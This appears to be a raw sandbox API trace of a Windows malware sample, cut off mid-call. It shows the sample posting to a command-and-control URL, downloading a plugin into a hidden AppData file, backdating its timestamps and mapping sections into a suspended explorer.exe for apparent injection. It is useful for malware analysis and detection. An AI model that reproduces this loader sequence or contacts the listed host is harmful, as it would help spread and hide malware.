returned="604954A450752B96B72CF2C4FA84486C9C354B42" [0157.187] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0157.187] lstrcatA (in: lpString1="", lpString2="-w8ar0W.Y20g,\"Jw]WGw(y]J'.?.L?:EQu@umB`^((^&^0X(t[g0qd3DV\"AbAtyrz.\".(I&b\\I4J.;YS1\\o\\)ww(my=MT\"$nr;osw\\lZK!,)nTWLg(KLW?'m6!^FJVEI2\\Do=;/;521Q/m'mki$AFi'^8<2,0PX\\g'X" | out: lpString1="-w8ar0W.Y20g,\"Jw]WGw(y]J'.?.L?:EQu@umB`^((^&^0X(t[g0qd3DV\"AbAtyrz.\".(I&b\\I4J.;YS1\\o\\)ww(my=MT\"$nr;osw\\lZK!,)nTWLg(KLW?'m6!^FJVEI2\\Do=;/;521Q/m'mki$AFi'^8<2,0PX\\g'X") returned="-w8ar0W.Y20g,\"Jw]WGw(y]J'.?.L?:EQu@umB`^((^&^0X(t[g0qd3DV\"AbAtyrz.\".(I&b\\I4J.;YS1\\o\\)ww(my=MT\"$nr;osw\\lZK!,)nTWLg(KLW?'m6!^FJVEI2\\Do=;/;521Q/m'mki$AFi'^8<2,0PX\\g'X" [0157.187] lstrlenA (lpString="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 59 [0157.187] lstrlenA (lpString=".bit") returned 4 [0157.187] GetProcessHeap () returned 0x210000 [0157.187] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10c) returned 0x2fc6f0 [0157.187] lstrlenA (lpString="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 59 [0157.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x477b7c0, cbMultiByte=60, lpWideCharStr=0x2fc6f0, cchWideChar=120 | out: lpWideCharStr="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 60 [0157.187] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x746f708 | out: pProxyConfig=0x746f708) returned 1 [0157.217] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ff630 [0157.218] WinHttpCrackUrl (in: pwszUrl="http://hockeysministries.org/playoff/chmpion4378/hockey.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x746f7d0 | out: lpUrlComponents=0x746f7d0) returned 1 [0157.219] WinHttpConnect (hSession=0x2ff630, pswzServerName="hockeysministries.org", nServerPort=0x50, dwReserved=0x0) returned 0x466d660 [0157.230] GetProcessHeap () returned 0x210000 [0157.231] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x12) returned 0x464c680 [0157.231] GetProcessHeap () returned 0x210000 [0157.231] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x68) returned 0x46835b0 [0157.231] WinHttpOpenRequest (hConnect=0x466d660, pwszVerb="POST", pwszObjectName="/playoff/chmpion4378/hockey.php", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x100) returned 0x46a9e60 [0157.231] GetProcessHeap () returned 0x210000 [0157.231] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x3a) returned 0x477bae0 [0157.231] GetProcessHeap () returned 0x210000 [0157.231] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fdfb0 [0157.231] wsprintfW (in: param_1=0x2fdfb0, param_2="Accept: */*\r\nReferer: %S" | out: param_1="Accept: */*\r\nReferer: http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 81 [0157.231] WinHttpAddRequestHeaders (hRequest=0x46a9e60, pwszHeaders="Accept: */*\r\nReferer: http://hockeysministries.org/playoff/chmpion4378/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0157.231] GetProcessHeap () returned 0x210000 [0157.231] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fdfb0) returned 1 [0157.231] GetProcessHeap () returned 0x210000 [0157.231] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x477bae0) returned 1 [0157.231] WinHttpSendRequest (hRequest=0x46a9e60, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x2e8cb0*, dwOptionalLength=0xe2, dwTotalLength=0xe2, dwContext=0x0) returned 1 [0157.330] WinHttpReceiveResponse (hRequest=0x46a9e60, lpReserved=0x0) returned 1 [0157.330] GetProcessHeap () returned 0x210000 [0157.330] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2800) returned 0x479d970 [0157.331] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x479d970, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x479d970*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.332] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479d970, Size=0x5000) returned 0x47a1190 [0157.332] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47a3990, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47a3990*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.355] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x47a1190, Size=0x7800) returned 0x47a71b0 [0157.356] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47ac1b0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47ac1b0*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.357] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x47a71b0, Size=0xa000) returned 0x47ae9c0 [0157.357] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47b61c0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47b61c0*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.358] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x47ae9c0, Size=0xc800) returned 0x479d970 [0157.358] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47a7970, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47a7970*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.381] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479d970, Size=0xf000) returned 0x479d970 [0157.381] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47aa170, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47aa170*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.381] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479d970, Size=0x11800) returned 0x47ad990 [0157.382] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47bc990, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47bc990*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.385] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x47ad990, Size=0x14000) returned 0x7630080 [0157.387] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7641880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7641880*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.387] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x16800) returned 0x479e980 [0157.388] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47b2980, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47b2980*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.388] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479e980, Size=0x19000) returned 0x479e980 [0157.388] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47b5180, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47b5180*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.406] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479e980, Size=0x1b800) returned 0x479e980 [0157.406] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47b7980, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47b7980*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.406] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479e980, Size=0x1e000) returned 0x479e980 [0157.406] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47ba180, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47ba180*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.407] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479e980, Size=0x20800) returned 0x479e980 [0157.407] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47bc980, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47bc980*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.410] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479e980, Size=0x23000) returned 0x479e980 [0157.410] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x47bf180, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x47bf180*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.414] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x479e980, Size=0x25800) returned 0x7630080 [0157.415] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7653080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7653080*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.416] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x28000) returned 0x7630080 [0157.416] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7655880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7655880*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.431] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x2a800) returned 0x7630080 [0157.431] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7658080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7658080*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.432] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x2d000) returned 0x7630080 [0157.432] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x765a880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x765a880*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.433] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x2f800) returned 0x7630080 [0157.433] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x765d080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x765d080*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.437] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x32000) returned 0x7630080 [0157.437] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x765f880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x765f880*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.438] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x34800) returned 0x7630080 [0157.438] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7662080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7662080*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.438] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x37000) returned 0x7630080 [0157.439] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7664880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7664880*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.439] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x39800) returned 0x7630080 [0157.439] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7667080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7667080*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.440] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x3c000) returned 0x7669890 [0157.442] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x76a3090, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x76a3090*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.444] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7669890, Size=0x3e800) returned 0x76a68b0 [0157.447] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x76e28b0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x76e28b0*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.447] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x76a68b0, Size=0x41000) returned 0x7630080 [0157.447] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x766e880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x766e880*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.448] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x43800) returned 0x7630080 [0157.448] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7671080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7671080*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.448] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x46000) returned 0x7630080 [0157.448] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7673880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7673880*, lpdwNumberOfBytesRead=0x746f780*=0x2800) returned 1 [0157.449] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x48800) returned 0x7630080 [0157.449] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7676080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7676080*, lpdwNumberOfBytesRead=0x746f780*=0x10a8) returned 1 [0157.449] RtlReAllocateHeap (Heap=0x210000, Flags=0x8, Ptr=0x7630080, Size=0x4b000) returned 0x7630080 [0157.449] WinHttpReadData (in: hRequest=0x46a9e60, lpBuffer=0x7677128, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x746f780 | out: lpBuffer=0x7677128*, lpdwNumberOfBytesRead=0x746f780*=0x0) returned 1 [0157.450] VirtualAlloc (lpAddress=0x0, dwSize=0x470a8, flAllocationType=0x3000, flProtect=0x4) returned 0x47e0000 [0157.453] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x7630080) returned 1 [0157.453] WinHttpCloseHandle (hInternet=0x46a9e60) returned 1 [0157.453] WinHttpCloseHandle (hInternet=0x466d660) returned 1 [0157.453] GetProcessHeap () returned 0x210000 [0157.453] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x464c680) returned 1 [0157.453] GetProcessHeap () returned 0x210000 [0157.453] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46835b0) returned 1 [0157.453] WinHttpCloseHandle (hInternet=0x2ff630) returned 1 [0157.460] GetProcessHeap () returned 0x210000 [0157.460] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0157.460] GetProcessHeap () returned 0x210000 [0157.460] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x468f150) returned 1 [0157.460] GetProcessHeap () returned 0x210000 [0157.460] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2e8cb0) returned 1 [0157.461] lstrlenA (lpString="ã\x070|:|plugin_size=290955") returned 24 [0157.461] GetProcessHeap () returned 0x210000 [0157.461] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x15) returned 0x464c6a0 [0157.461] lstrlenA (lpString="0|:|plugin_size=290955") returned 22 [0157.461] lstrlenA (lpString="plugin_size") returned 11 [0157.461] atoi (_Str="290955") returned 290955 [0157.461] lstrlenA (lpString="0|:|plugin_size=290955") returned 22 [0157.461] lstrlenA (lpString="|:|") returned 3 [0157.461] MapViewOfFile (hFileMappingObject=0x61c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4ad0000 [0157.471] lstrcatA (in: lpString1="", lpString2="plugin_size=290955" | out: lpString1="plugin_size=290955") returned="plugin_size=290955" [0157.471] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x4ad0000) returned 0x0 [0157.480] VirtualAlloc (lpAddress=0x0, dwSize=0x4708b, flAllocationType=0x3000, flProtect=0x4) returned 0x4830000 [0157.483] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gaejfer" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gaejfer")) returned 0 [0157.484] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gaejfer" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gaejfer"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0157.484] GetProcessHeap () returned 0x210000 [0157.484] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x16) returned 0x464c5a0 [0157.484] lstrlenA (lpString="604954A450752B96B72CF2C4FA84486C9C354B42") returned 40 [0157.485] WriteFile (in: hFile=0x644, lpBuffer=0x4830000*, nNumberOfBytesToWrite=0x4708b, lpNumberOfBytesWritten=0x746f990, lpOverlapped=0x0 | out: lpBuffer=0x4830000*, lpNumberOfBytesWritten=0x746f990*=0x4708b, lpOverlapped=0x0) returned 1 [0157.490] CloseHandle (hObject=0x644) returned 1 [0157.494] GetProcessHeap () returned 0x210000 [0157.494] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x210) returned 0x47615c0 [0157.494] GetSystemDirectoryA (in: lpBuffer=0x47615c0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.494] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0157.494] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0157.494] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gaejfer", dwFileAttributes=0x6) returned 1 [0157.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gaejfer" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gaejfer"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x644 [0157.494] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x746f8a0 | out: lpFileInformation=0x746f8a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd6200)) returned 1 [0157.494] SetFileTime (hFile=0x644, lpCreationTime=0x746f8a4, lpLastAccessTime=0x746f8ac, lpLastWriteTime=0x746f8b4) returned 1 [0157.494] CloseHandle (hObject=0x644) returned 1 [0157.495] GetProcessHeap () returned 0x210000 [0157.495] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x47615c0) returned 1 [0157.495] GetProcessHeap () returned 0x210000 [0157.495] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x464c5a0) returned 1 [0157.495] VirtualFree (lpAddress=0x4830000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.496] atoi (_Str="0") returned 0 [0157.497] VirtualFree (lpAddress=0x47e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.498] GetProcessHeap () returned 0x210000 [0157.498] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x477b7c0) returned 1 [0157.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gaejfer" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gaejfer"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0157.498] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4708b [0157.498] GetProcessHeap () returned 0x210000 [0157.498] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x47094) returned 0x7630080 [0157.503] ReadFile (in: hFile=0x644, lpBuffer=0x7630080, nNumberOfBytesToRead=0x4708b, lpNumberOfBytesRead=0x746f850, lpOverlapped=0x0 | out: lpBuffer=0x7630080*, lpNumberOfBytesRead=0x746f850*=0x4708b, lpOverlapped=0x0) returned 1 [0157.503] lstrlenA (lpString="604954A450752B96B72CF2C4FA84486C9C354B42") returned 40 [0157.504] CloseHandle (hObject=0x644) returned 1 [0157.504] GetProcessHeap () returned 0x210000 [0157.504] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x44) returned 0x477b7c0 [0157.504] lstrlenA (lpString="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 59 [0157.504] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x477b7c0, Length=0x3b) returned 0x477da475 [0157.504] GetProcessHeap () returned 0x210000 [0157.504] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x44) returned 0x477bb30 [0157.504] GetProcessHeap () returned 0x210000 [0157.504] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fc6f0 [0157.505] GetSystemWow64DirectoryA (in: lpBuffer=0x2fc6f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\SysWOW64") returned 0x13 [0157.505] GetProcessHeap () returned 0x210000 [0157.505] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fde90 [0157.505] GetProcessHeap () returned 0x210000 [0157.505] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x464c5a0 [0157.505] wsprintfA (in: param_1=0x2fde90, param_2="%s%s" | out: param_1="C:\\Windows\\SysWOW64\\explorer.exe") returned 32 [0157.505] GetProcessHeap () returned 0x210000 [0157.505] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x464c5a0) returned 1 [0157.505] CreateProcessInternalA (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\explorer.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\SysWOW64", lpStartupInfo=0x746f900*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x746f8b8, hNewToken=0x0 | out: lpProcessInformation=0x746f8b8*(hProcess=0x634, hThread=0x644, dwProcessId=0x8b0, dwThreadId=0x8c0), hNewToken=0x0) returned 1 [0157.603] GetProcessHeap () returned 0x210000 [0157.603] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x39d6c) returned 0x7677120 [0157.604] lstrcatA (in: lpString1="", lpString2="604954A450752B96B72CF2C4FA84486C9C354B42" | out: lpString1="604954A450752B96B72CF2C4FA84486C9C354B42") returned="604954A450752B96B72CF2C4FA84486C9C354B42" [0157.604] GetCurrentProcessId () returned 0xbdc [0157.604] lstrcatA (in: lpString1="", lpString2="http://hockeysministries.org/playoff/chmpion4378/hockey.php" | out: lpString1="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned="http://hockeysministries.org/playoff/chmpion4378/hockey.php" [0157.604] lstrcatW (in: lpString1="", lpString2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" | out: lpString1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" [0157.605] VirtualQuery (in: lpAddress=0x7677120, lpBuffer=0x746f730, dwLength=0x30 | out: lpBuffer=0x746f730*(BaseAddress=0x7677000, AllocationBase=0x7630000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x71000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0157.605] NtCreateSection (in: SectionHandle=0x746f7d0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7d0*=0x5fc) returned 0x0 [0157.605] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0x634, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x70000, SectionOffset=0x0, ViewSize=0x746f750*=0x6b000) returned 0x0 [0158.210] NtCreateSection (in: SectionHandle=0x746f7c8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7c8*=0x610) returned 0x0 [0158.211] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0x634, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0xe0000, SectionOffset=0x0, ViewSize=0x746f750*=0x74000) returned 0x0 [0158.213] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0xffffffffffffffff, 